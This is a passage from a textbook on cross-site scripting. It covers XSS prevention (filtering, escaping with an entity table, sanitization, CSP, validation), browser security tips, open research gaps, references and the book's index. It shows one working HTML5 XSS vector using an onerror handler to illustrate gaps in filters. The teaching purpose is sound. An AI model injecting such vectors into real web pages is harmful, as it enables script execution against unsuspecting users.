18. ImmuneWeb on-demand. [online] Available at: https://www.imm
uniweb.com/products/ondemand/.
19. Netsparker. [online] Available at: https://www.netsparker.com/.
20. OWASP Antisamy. [online] Available at: https://www.owasp.org/
index.php/Category:OWASP_AntiSamy_Project.
Real-World XSS Worms and Handling Tools    ◾   123

21. OWASP HTML sanitizer. [online] Available at: https://www.owa


sp.org/index.php/OWASP_Java_HTML_Sanitizer_Project.
22. OWASP Xenotix XSS exploit framework. [online] Available at:
https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Explo
it_Framework.
23. OWASP Zed Attack Proxy (ZAP). [online] Available at: https://ww
w.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project.
24. Kozlowski, M. Power Fuzzer: web application vulnerabilities scan-
ner. [online]. Available: https://www.powerfuzzer.com/.
25. Loureiro, N. Probely: web vulnerability scanner. [online]. Available
at: https://blog.probely.com/web-security-testing-101-c08bc9117768.
26. Sahoo, S. R., & Gupta, B. B. (2019). Hybrid approach for detec-
tion of malicious profles in twitter. Computers and Electrical
Engineering, 76, 65–81.
27. Seth, F., Jeremiah, G., Robert, H., Anton, R., & Petko, D. P. (2011).
XSS Attacks: Cross Site Scripting Exploits and Defense. Elsevier.
28. Subgraph Vega vulnerability scanner. [online] Available at: https://
subgraph.com/vega/.
29. W3af. [online] Available at: http://w3af.org/.
30. WebScaracb. [online] Available at: https://www.owasp.org/ind
ex.php/Category:OWASP_WebScarab_Project.
31. XSSer. [online] Available at: https://xsser.03c8.net/.
CHAPTER 6

XSS Preventive
Measures and
General Practices

T his chapter puts emphasis on some of the general mech-


anisms that can be adopted to alleviate the XSS attack to
a large extent. We focus on the XSS prevention rules that can
be adopted on the developer’s side to prevent the XSS attack.
Nevertheless, it is obvious to say that these methods are not
magic; these are inefective without the user’s awareness. Hence,
additionally, we present a brief discussion on the general prac-
tices to keep our browser secure. In the next section, we discuss
the XSS prevention rules.

6.1 INTRODUCTION
Until now, we have gone through much information that is suf-
fcient to understand the theory behind the XSS attack. From this,
we can extract the fact that this vulnerability is not going away
easily because there is a lack of support in majority of the tools,
125
126 ◾ Cross-Site Scripting Attacks

scanners, or techniques that help in permanently fxing this prob-


lem. Tere are many reasons behind this fact, but the main causes
are frstly, the browser is not intelligent; it only performs what
it is told. It has no capability to check whether a code may have
malign efects. Nevertheless, it doesn’t seem to be the browser’s
task. Another reason for the XSS prevalence is the designing of
applications with security negligence, i.e. developing less/unse-
cure applications. Consequently, the user is lef with two options:
either to disable the JavaScript in its browser’s settings or visit
only the known and secure sites. But it seems to be a difcult task
for every internet user to have the knowledge of technicalities or
think too much while browsing.
Terefore, this chapter emphasizes on some of the general
mechanisms that can be adopted to alleviate the XSS attack to a
large extent [3, 5, 6]. It focuses on discussing the XSS prevention
rules that can be adopted at the developer’s side to prevent the
XSS attack. Nevertheless, it is obvious to say that these methods
are not magic; these are inefective without the user’s awareness.
Hence, additionally, the chapter presents a brief discussion on the
general practices to keep our browser secure. In the next section,
we discuss the XSS prevention rules.

6.2 XSS PREVENTION SCHEMES


XSS vulnerability [9] takes the benefts of an improper input flter-
ing which makes malicious code injection easier for the attacker.
Tis vulnerability occupies a high ranking position among the top
10 web application vulnerabilities released by OWASP and persists
itself in the security-related news. Tere is a constant increase in
the proliferation of the XSS vulnerability as highlighted in Figure
6.1, and it is clearly observed that only two vulnerabilities are rul-
ing the world of security attacks on web applications: one is the
XSS and the another is the injection vulnerability like SQL, LDAP,
etc. [13] As a result, multiple prevention techniques have been
designed that can be adopted by the developers to prevent the XSS
XSS Preventive Measures and General Practices    ◾   127

FIGURE 6.1 Increase in the XSS vulnerability with years.


128 ◾ Cross-Site Scripting Attacks

attack. Tese techniques include fltering, escaping, and sanitiza-


tion of untrusted data entered by the user. In the following subsec-
tions, we present a detailed discussion on each of these techniques.

6.2.1 Filtering
Te root cause of the XSS (as discussed earlier) is the inappro-
priate input fltering [10, 14]. Mainly, the user can submit some
form of data to the web site through many ways such as using
form submission and message posting, or through advance meth-
ods like JSON, AJAX, XML, etc. As this is an untrusted infor-
mation entered by the user, it must not be processed in its raw
form as it may impose serious security implications like the XSS.
Tereby, the frst and foremost technique to prevent against an
XSS attack is fltering. It means the user’s entire untrusted data
must pass through a flter that flters out the harmful keywords
like <script> tag, HTML suspicious event handlers like onActi-
vate(), onClick(), JavaScript elements, style sheet tags, and so on.
Tere are two types of fltering that can be applied: input flter-
ing and output fltering. Input fltering is the same as discussed
earlier, i.e. removing of suspicious keywords form the entered
data, whereas output fltering is applied on data that is refected
back in the response web page. It basically works for the persistent
XSS attack. Nevertheless, every method has its limitations. Te
disadvantage of this technique is that it also removes legitimate
data if it matches with restricted keywords. To overcome this, the
flters need to be relaxed to include the necessary tags and ele-
ments, paving the way for hacker and attacker.

6.2.2 Escaping
Escaping or encoding is another method to prevent the XSS attack
[10, 15]. It works by restricting the malicious script code from
getting executed in the browser. It means the browser will treat
the user input data as data and will not execute anything related
to it. Terefore, if the attacker injects some illicit script code
XSS Preventive Measures and General Practices    ◾   129

then the browser will not run it, if escaping is applied properly.
Consequently, the user will remain unafected. Tere are many
types of encoding that can be applied to any web page. Let’s dis-
cuss each one of them.

• HTML Entity Escaping: Tis type of escaping is applied


when the untrusted data is inserted using any HTML body
tags like div, p, td, etc. We have shown some of the examples
of HTML entity escaping in Table 6.1.
• Attribute Value Escaping: It restricts the untrusted data
to be directly inserted into suspicious attributes like “href,”
“src,” “style,” etc. It performs encoding of all characters with
ASCII value smaller than 256 with &#HH, where HH=
hexadecimal value, leaving alphanumeric characters intact.
• JavaScript Escaping: JavaScript features like script block
and event handlers are more prone to the XSS vulnerability.
Terefore, they perform the data entered using these methods
with \uxxxx, i.e. Unicode escaping format, where, x = integer.
• URL Escaping: Te untrusted data is found only in the
parameter value, so the encoding is applied on the param-
eter values. It uses %HH escaping format.

TABLE 6.1 HTML Entity Encoding


Character Encoded Format
& &amp; or &#38
< < or &#60
> > or &#62
“ &quot; or &#34
‘ ' or &#39
/ / or &#47
( &#40
) &#41
# &#35
130 ◾ Cross-Site Scripting Attacks

• CSS Escaping: Style sheets can also be used for the injection
purposes. Terefore, this encoding uses \HH and &\HHHH
escaping format.

Escaping is also of two types: input escaping and output escap-


ing. Input escaping is efective only if it can correctly identify the
context of the untrusted data inserted. On the other hand, output
escaping is applied on the data written in the response web page.
It also considers the context of the data and is helpful in prevent-
ing stored XSS attack.

6.2.3 Sanitization
It is another technique in hand to prevent against the XSS attack
[7, 10]. It is basically a process of cleaning the data or sanitizing
the data to make it secure from suspicious HTML tags or elements
like <scripts>. It ensures that the entered data is in the same for-
mat that is expected to be received for that particular input feld
in the web site. It is required in the case where the site can accept
input from the user with diverse content including HTML tags
or style felds. So sanitizing the data is a must to eliminate the
harmful efects. Tere are several libraries or directives available
to perform sanitization like HtmlSanitizer by OWASP, Ruby on
Rails SanitizeHelper, DOMpurify, PHP HTML purifer, Python
Bleach, and many more.

6.2.4 Use Content Security Policy (CSP)


Attacker can inject malicious scripts either using <script> tag or
using HTML tag or it might be possible that the browser loads the
JavaScript from external sources. Now, this opens up the path for
the attacker to infect the user. Here, the attacker dodges the user’s
browser to load script from an unknown external source; now, the
browser is not capable to distinguish between malicious scripts
and a legitimate one. Hence, the browser executes the script sim-
ply without knowing the source and the intention. It may infect
XSS Preventive Measures and General Practices    ◾   131

the user with various code injection vulnerabilities like the XSS.
Hence, Mozilla proposed a security prototype named as Content
Security Policy (CSP) to mitigate various types of web applica-
tion security vulnerabilities like the XSS [1]. It allows a web site
developer to specify the location to retrieve the external resources
on the web. Terefore, the browser is allowed to access only those
resources that are whitelisted, ignoring all other domains of
resources. Consequently, the injected scripts won’t get executed
even if the attacker fnds a way to inject them into the web site.
However, it requires all the embedded JavaScript codes to be
shifed to a separate fle. Consequently, it demands modifcations
in the web application which is a tedious task for the large web
applications over the web. It also needs modifcation in both the
web site and the web browser.

6.2.5 Data Validation


Te attacker keeps an eye on the input felds that lack data vali-
dation, meaning that somehow he might be able to submit the
malicious script through any feld. For instance, suppose there is
a feld to enter an email id but the validation is not applied, then
the attacker may inject anything malicious that can be rendered
by the browser.
Data validation [12] is a technique that ensures that the entered
data comes within the syntactical constraints that are defned for
that particular site to prevent from anything unwanted and mali-
cious. Tere are various functions available in diferent languages
like in PHP and functions like is_numeric(), preg_match(), etc.
are defned to validate the data or you can use regular expressions
to validate the data.

6.3 DIFFERENT PRACTICES FOR


BROWSER SECURITY
In this section, we discuss on some of the general practices and
tips that can be implemented to keep the browser safe and secure
132 ◾ Cross-Site Scripting Attacks

from lots of internet threats [2, 4, 8, 11]. Te attacker takes advan-


tage of the weak security features in the browser, which the inno-
cent users have to pay for. Once the attacker gains control of the
browser, then no user consent is asked to perform the malicious
activities that can afect the personal as well as professional life
of the user. Since these vulnerabilities are not new, and are not in
the limelight , these have been prevalent on the internet for a long
time. So this refects only one thing that the browser developers
are less focused toward providing a secure browser. Terefore, we
present some tips to the user to be safe and secure from threats.
Te tips are as given below:

• Restricting Redirection: Sites that easily redirect to other


sites just for keeping logs of link click count or to provide
warning against pop-up advertisements while downloading
on the internet are more likely to become infected with the
XSS attack. Terefore, it is highly recommended to restrict
redirection to other sites. As redirected sites may be the
attacker’s zone to steal sensitive information.
• Same Origin Policy (SOP): Tis simply permits a JavaScript
program to obtain read or write access on the data that have
an identical origin as the script itself. Te origin is identifed
by the URL address: host name, port number, and proto-
col version. However, port number and protocol version are
static in nature. On the other hand, the SOP is also frag-
ile enough to permit partial cross-domain access as Java
Script can manipulate the host name. Tis policy merely
has two alternatives: either “no access at all” or else “unre-
stricted access.” Moreover, the functions in the two difer-
ent scripts from dissimilar domains can be invoked on the
same web page. Although it does not prevent any data from
other domains being requested and loaded, this can trans-
fer information to any other arbitrary domain for detecting
XSS Preventive Measures and General Practices    ◾   133

malicious activities like stealing cookies. Terefore, the XSS


attack can infect a whole susceptible web application.
• Usage of Cookie by Tird-Party Applications: Cookie
information is private to the user as it keeps track of the
user’s sessions on the internet. Tere are security settings
in the browser where the user can control the cookie usage
by the other sites. Some browsers like Firefox and IE keep
this feature disabled by default. But what about if the user
is using some other browser. Terefore, the user has to
keep track of sites that are using cookie information. It
preserves the user’s privacy and keeps away other security
breaches.
• Extending the Browser’s Security: It depends on the user
to keep his security high while browsing. Tere are multi-
ple explicit tools that can be integrated with the browser to
extend its security. Tese tools include NoScript for Firefox,
Netcraf Anti-Phishing toolbar for Firefox and IE, and so
many. Tese assist in protecting from phishing attack, pop-
ups attacks, password stealing, and so on.
• Don’t Click Lengthy URL’s: Te attacker entices the victim
by sending URLs that may be in obfuscated fashion and are
too lengthy. Terefore, it is suggested to ignore these URLs
and never ever click them until the authenticity of source is
known to the user. Tis helps in getting protection against
refected XSS, phishing attack, redirection misuse, and
many other threats.
• Use Sandboxed Environment: Sometimes, the users want to
use some third-party components or need to visit unsecure
sites, then it is suggested to use a sandboxed environment
to keep the surfng activity separate from the other ongo-
ing activities, so that if any malicious activity occurs then
there is no harm to the other programs taking place and it
134 ◾ Cross-Site Scripting Attacks

remains unafected. It helps in protecting sensitive informa-


tion from getting stolen by the attacker.

6.4 OPEN RESEARCH DIRECTIONS


Tere are several quantities of studies that have been discussed
while formulating this classifcation of the existing XSS defensive
work. Tere are some research gaps which are present in the cur-
rently existing solutions. Tese are as discussed below:

• Less Attention toward New Type of XSS Attack: Most of the


existing state-of-the-art XSS defensive techniques provide
protection against traditional type of XSS attacks, i.e. stored
and refected XSS. Tere exist no robust solutions that can
efectively protect against new type of XSS attack, i.e. DOM
and mutation-based XSS attack. Terefore, it is the need of
the hour to design techniques that can efectively defend
against.
• Inappropriate Diferentiation: Web applications are devel-
oped using dynamic programming concepts and rich
high-level languages like JavaScript. Terefore, the brows-
ers simply cannot block the JavaScript code for defending
against an XSS attack. It has to allow the JavaScript code
permitted by the web application developer. To achieve
this, some techniques have been developed to diferentiate
between benign and malicious JavaScript codes. However,
the attacker uses obfuscation approach to inject malicious
JavaScript code into the web applications. Consequently, it
has become a tedious task to diferentiate benign and mali-
cious code. Terefore, the researchers must incorporate such
techniques that can accurately diferentiate between benign
and malicious codes.
• Improper Handling of Partial Script Injection: In order to
exploit the XSS vulnerabilities, the attacker simply injects
XSS Preventive Measures and General Practices    ◾   135

malicious JavaScript codes into the web applications.


However, the techniques have been designed to identify these
JavaScript codes by using string matching algorithm that
performs exact matching. Terefore, the attacker exploits
partial script injection approach to inject malicious scripts.
Nevertheless, only few techniques exist that can identify
partial script injection (modifcation of benign script) to
detect an XSS attack. Tus, techniques must incorporate the
mechanisms to perform partial script injection detection to
mitigate the XSS attack completely.
• Inappropriate Context Determination: Existing literature
has introduced some of the XSS defensive mechanisms that
perform the context-sensitive sanitization on the untrusted/
malicious variables of the JavaScript code. Such techniques
determine the context of unsafe JavaScript/HTML vari-
ables and accordingly performs the sanitization on them.
However, this sort of sanitization is no longer efective as
it does not determine the nested context of such untrusted
variables. Terefore, most of the inner/nested context of such
variables is uncovered with the sanitization routines that
lead to the exploitation of the XSS worms. Te XSS defen-
sive technique must incorporate a mechanism of determin-
ing the nested context of such malicious variables and must
perform the accurate placement of sanitization routines in
such contexts.
• Incompetent Sanitization Support for New HTML5
Features: In the contemporary era of the World Wide Web
(WWW), HTML5 is being utilized as an emerging platform
for the development of modern web applications. Te key
advantage of adopting this feature is that it can be easily
integrated among the other platforms of the web browsers.
However, it introduces some new tags and attributes (such
136 ◾ Cross-Site Scripting Attacks

as <video>, <source>, <autofocus>, etc.) which can be uti-


lized for creating the new XSS attack vectors.

<video><source onerror=”alert(1)”></video>

Te modern web browsers or the existing XSS flters do


not check for this HTML5 attack vector. A simple pop-up
window will appear with the message “1” on the screen.
Terefore, a robust XSS defensive solution is the need of the
hour that will detect and introduce an efective mechanism
of sanitizing/fltering the HTML5 XSS attack vectors.

6.5 CHAPTER SUMMARY


In this chapter, we attempted to present the layers of security that
can be applied to prevent the XSS attack. Nevertheless, individually,
each technique is less efective. To remain more attentive and care-
ful while detecting XSS, there is a requirement to integrate mul-
tiple techniques like secure coding, static and dynamic testing of
the web applications, proper fltering and sanitization schemes, etc.
Additionally, we discussed the browser’s security tips and general
practices, followed by some open research directions to continue
in the direction of designing an innovative and efective approach.

REFERENCES
1. Content security policy. [online] Available at: https://developer.mo
zilla.org/en-US/docs/Web/HTTP/CSP.
2. Gupta, B. B. (ed.). (2018). Computer and Cyber Security: Principles,
Algorithm, Applications, and Perspectives. CRC Press.
3. Gupta, B. B., Gupta, S., & Chaudhary, P. (2017). Enhancing the
browser-side context-aware sanitization of suspicious HTML5
code for halting the DOM-based XSS vulnerabilities in cloud.
International Journal of Cloud Applications and Computing, 7(1),
1–31.
4. Gupta, B. B., & Sheng, Q. Z. (eds.). (2019). Machine Learning for
Computer and Cyber Security: Principle, Algorithms, and Practices.
CRC Press.
XSS Preventive Measures and General Practices    ◾   137

5. Gupta, S., & Gupta, B. B. (2015). BDS: Browser dependent XSS sani-
tizer. In Handbook of Research on Securing Cloud-Based Databases
with Biometric Applications (pp. 174–191). IGI Global.
6. Gupta, S., & Gupta, B. B. (2016). JS-SAN: Defense mechanism for
HTML5‐based web applications against JavaScript code injec-
tion vulnerabilities. Security and Communication Networks, 9(11),
1477–1495.
7. Gupta, S., Gupta, B. B., & Chaudhary, P. (2018). A client‐server
JavaScript code rewriting-based framework to detect the XSS
worms from online social network. Concurrency and Computation:
Practice and Experience, 31(21), e4646.
8. Jiang, F., Fu, Y., Gupta, B. B., Lou, F., Rho, S., Meng, F., & Tian,
Z. (2018). Deep learning based multi-channel intelligent attack
detection for data security. IEEE Transactions on Sustainable
Computing.
9. Sarmah, U., Bhattacharyya, D. K., & Kalita, J. K. (2018). A sur-
vey of detection methods for XSS attacks. Journal of Network and
Computer Applications, 118, 113–143.
10. Seth, F., Jeremiah, G., Robert, H., Anton, R., & Petko, D. P. (2011).
XSS Attacks: Cross Site Scripting Exploits and Defense. Elsevier.
11. Stergiou, C., Psannis, K. E., Xiflidis, T., Plageras, A. P., & Gupta,
B. B. (2018, April). Security and privacy of big data for social
networking services in cloud. In IEEE INFOCOM 2018-IEEE
Conference on Computer Communications Workshops (INFOCOM
WKSHPS) (pp. 438–443). IEEE.
12. Taha, T. A., & Karabatak, M. (2018, March). A proposed approach
for preventing cross-site scripting. In 2018 6th International
Symposium on Digital Forensic and Security (ISDFS) (pp. 1–4).
IEEE.
13. White hat security report. [online] Available at: https://info.wh
itehatsec.com/rs/675-YBI-674/images/WHS%202017%20Applic
ation%20Security%20Report%20FINAL.pdf.
14. XSS flter evasion cheat sheet. [online] Available at: https://ww
w.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet.
15. XSS prevention cheat sheet. [online] Available at: https://cheatsh
eetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevent
ion_Cheat_Sheet.html.
Index

Access control list (ACL), 77, 85 Clickjacking, 38


Account hijacking, 58 Client-server architecture, 42
ACL, see Access control list Client-server side defensive
Action Authenticator, 85 approaches, 61, 66–68
Advanced authentication Client-side defensive approaches,
methods, 46 61–63, 66
Alternate hypothesis, 100 Clustered Scripts Template
Application logic/information, 3 Generator, 86–88
APR, see Automated Pre-processing Clustered template generation
Required algorithm, 87
Architectural conficts, 45 Clustering, 82
ASP.NET, 4–5 Clustering-based context-sensitive
Attribute value escaping, 129 sanitization, 78, 81–82
Automated Pre-processing Required Confdentiality, integrity, and
(APR), 103 availability (CIA), 42–43
Availability, of information, 43 Content Security Policy (CSP),
AVG PrivacyFix, 47 130–131
Context-Aware Sanitization
Back-end data store, 3 (CAS), 103
Broken access control, 16 Context-based sanitization, 77–78
Broken authentication, 16 abstract design, 78–80
Browser exploitation, 58 algorithm of, 90
Browser’s security, practices for, detailed design, 79–81
131–134 recognition phase, 80–83
Burp Scanner, 120 training phase, 80
experimental testing and
CAS, see Context-Aware Sanitization evaluation results, 89
Category of XSS attack Detected detection outcome, 91,
(COXD), 103 95–97
CIA, see Confdentiality, integrity, implementation details, 92
and availability testing platforms, 92
139
140 ◾ Index

XSS attack vectors, categories proxy-based approaches, 61,


of, 92–95 66, 69–70
modules server-side approaches, 61,
Action Authenticator, 85 64–66
Clustered Scripts Template views of, 76–77
Generator, 86–88 efects of, 55, 57, 58
Context-Based Sanitizer, examination steps, 54–55
88–89 identifcation and mitigation, 9
HTML Content Separator, 85 open research directions, 134–136
HTML Parser, 84–85 origin of, 54
Injection Point Identifer, 84 performance analysis
Script Extractor, 85–86 comparative analysis, 103, 104
Session Supervisor, 84 F-Measure, 97–99
URL Synchronizer, 84 F-test hypothesis, 99–103
View Manager, 84 prevention schemes
vs. other works, 103, 104 Content Security Policy (CSP),
Context-Based Sanitizer, 88–89 130–131
Context determination, 135 data validation, 131
Cookie information, 133 escaping/encoding, 128–130
Cookie stealing, 58 fltering, 128
Corporate espionage, 42 sanitization, 130
COXD, see Category of XSS attack recent incidences of, 55–57
Detected vectors
Cross-site scripting (XSS) attack, categories of, 92–95
17, 39 statistics of, 100–102
browser’s security, practices for, vulnerability proliferation,
131–134 126, 127
classifcation CSP, see Content Security Policy
DOM-based XSS attack, 60, 61 CSS escaping, 129
non-persistent XSS attack, Cyber bullying, 42
59, 60 Cyber stalking, 41
persistent XSS attack, 57, 59
code injection attack, 53 Data validation, 131
defensive approaches, 60–61 De-anonymization, 39
access control list (ACL), 77 Defensio, 47
client-server side approaches, Denial of Service Attack, 58
61, 66–68 Deserialization, 17
client-side approaches, Detection of Malicious JavaScript
61–63, 66 Functions (DMJSF), 103
context-based sanitization (see Distance-based clustering algorithm,
Context-based sanitization) 86, 92
Index    ◾   141

DMJSF, see Detection of Malicious Linear XSS worm, 117


JavaScript Functions Location leakage, 40
Document Object Model (DOM), 84 LogDog security, 47
Domain-centric web application
vulnerabilities, 11–14 Malware, 38
DOM-based XSS attack, 60, 61 McAfee Social Protection, 48
Dynamic testing, of web application Minor Monitor, 47
vulnerabilities, 8–10 Misinformation, 58
MyPermissions Social Media Privacy
Embedded protection techniques, 46 Protection, 48
Escaping/encoding, 128–130
Exponential XSS worm, 115 Net Nanny, 48
Netsparker, 120
Filtering, 128 Network security solutions, 46
F-Measure, 97–99 Non-persistent XSS attack, 59, 60
F-test hypothesis, 99–103 Norton Safe Web, 48
NoScript Security Suite, 47
HTML5 attack vectors, 135–136 Notifcation to user, 46
htmLawed, 119 Null hypothesis, 99
HTML Content Separator, 85
HTML entity escaping, 129 Online exploitation, 41
HTML Parser, 84–85 Online Social Networking (OSN), 29
HTML Purifer, 118 characteristics of, 31, 33
Hydra XSS worm, 117 social media attacks
distinct attack classes, 35,
Identity clone attack, 39 37–42
ILI, see Inclusion of Legitimate prevention solutions, 45–48
Inputs social network design vs. privacy
ImmuniWeb On-demand, 120 and security goals, 37, 42–45
Inclusion of Legitimate Inputs statistics of
(ILI), 103 active internet users, 30, 31
Inference attack, 39 number of users, 31, 32
Information leakage, 40 percentage of users by age
Injection attack, 16 group, 31, 32
Injection Point Identifer, 84 prominent services of, 30
Insecure deserialization, 17, 22 vulnerabilities incidences
Insufcient logging and on Instagram, 35
monitoring, 17 malware families, 35, 36
Integrity, of social media, 43 total number of
vulnerabilities, 33
JavaScript escaping, 129 on Twitter platform, 34
142 ◾ Index

Open Web Application Security Replication, XSS worms stage,


Project (OWASP), 10, 11 113–114
OSN, see Online Social Networking Reproduction, XSS worms stage, 114
OWASP, see Open Web Application Risk path assessment, 15, 18
Security Project Risk rating methods, mapping
OWASP Antisamy, 118 vulnerabilities with, 18–23
OWASP HTML Sanitizer, 118
OWASP Xenotix XSS Exploit Same Origin Policy (SOP), 132–133
Framework, 118 Samy worm, 111–113
OWASP Zed Attack Proxy (ZAP), 119 Sandboxed environment, 133
Sanitization, 77, 88, 130; see also
P2P architecture, see Peer-to-peer Context-based sanitization
architecture SCMech, see Scrutinizing
Partial script injection, 134–135 Mechanism
Peer-to-peer (P2P) architecture, 42, 45 SCMod, see Source Code
Persistent XSS attack, 57, 59 Modifcation
Phishing, 38, 58 SCMon, see Source Code Monitoring
PHP, 4–6 Script Extractor, 85–86
Power fuzzer, 120 Scrutinizing Mechanism
Privacy, of social users, 43 (SCMech), 103
vs. data mining, 44 Security misconfguration, 17
vs. enhanced searching Sensitive data exposure, 16
capabilities, 44 Server-side defensive approaches, 61,
vs. social connection, 44 64–66
Privacy Badger, 47 Session Supervisor, 84
Privacy breach through tagging, 41 Social bots, 39
Privacy Scanner for Facebook, 48 Social Media Attacks
Privacy settings classes of, 35, 37
enhanced security and, 46 description of, 35, 37–42
improved user interfaces for, 46 Socware, 40
Privileges capturing, XSS worms SOP, see Same Origin Policy
stage, 113, 114 Source Code Modifcation
Probely, 120 (SCMod), 103
Programming languages, web Source Code Monitoring
application using, 4–5 (SCMon), 103
Proxy-based defensive approaches, Spamming, 38
61, 66, 69–70 Spear phishing, 40
Static testing, of web application
Refected XSS attack, see Non- vulnerabilities, 8–10
persistent XSS attack Stored XSS attack, see Persistent XSS
Remote control on system, 58 attack
Index    ◾   143

Subgraph Vega Vulnerability SAST vs. DAST, 10


Scanner, 118 security assessment, 6
Sybil attack, 40 severity level, 3–6
static testing, 8–10
Treats from multimedia data, 41 top 10 vulnerabilities, 10, 11,
13–17
uBlock Origin, 47 XSS identifcation and
URL escaping, 129 mitigation, 9
URL Synchronizer, 84 Web browser, 3
WebScarab, 119
View Manager, 84 Web server, 2
Vulnerability abuse, XSS worms
stage, 113, 114 XDP, see XSS attack Detection
Profciency
W3af, 119 XML External Entities (XXE), 16
Web application architecture, 2–3 XSS attack, see Cross-site scripting
Web application vulnerabilities attack
average number of attacks, 13, 14 XSS attack Detection Profciency
consequences of attacks on users, (XDP), 103
13, 14 XSSer, 119
description of, 15–17 XSS Flash worm, 115–116
developing secure web XSS worms
applications classifcation
empowering application exponential XSS worm, 115
developers, 23–24 linear XSS worm, 117
risk identifcation and XSS Flash worm, 115–116
management, 19 handling tools, 117–120
secure patch release assurance, life cycle of, 113–114
19, 23 real-world incidences of, 110–111
in developing technologies, 6, 7 Samy worm, case study of,
domain-centric, 11–14 111–113
dynamic testing, 8–10 stages of, 110
evaluation against risk factors, XXE, see XML External Entities
19, 24
mapping with risk rating ZAP, see OWASP Zed Attack Proxy
methods, 18–23 ZoneAlarm Anti-phishing Chrome
overview, 15 Extension, 47
risk path assessment, 15, 16, 18 ZoneAlarm identity protection, 48

You might also like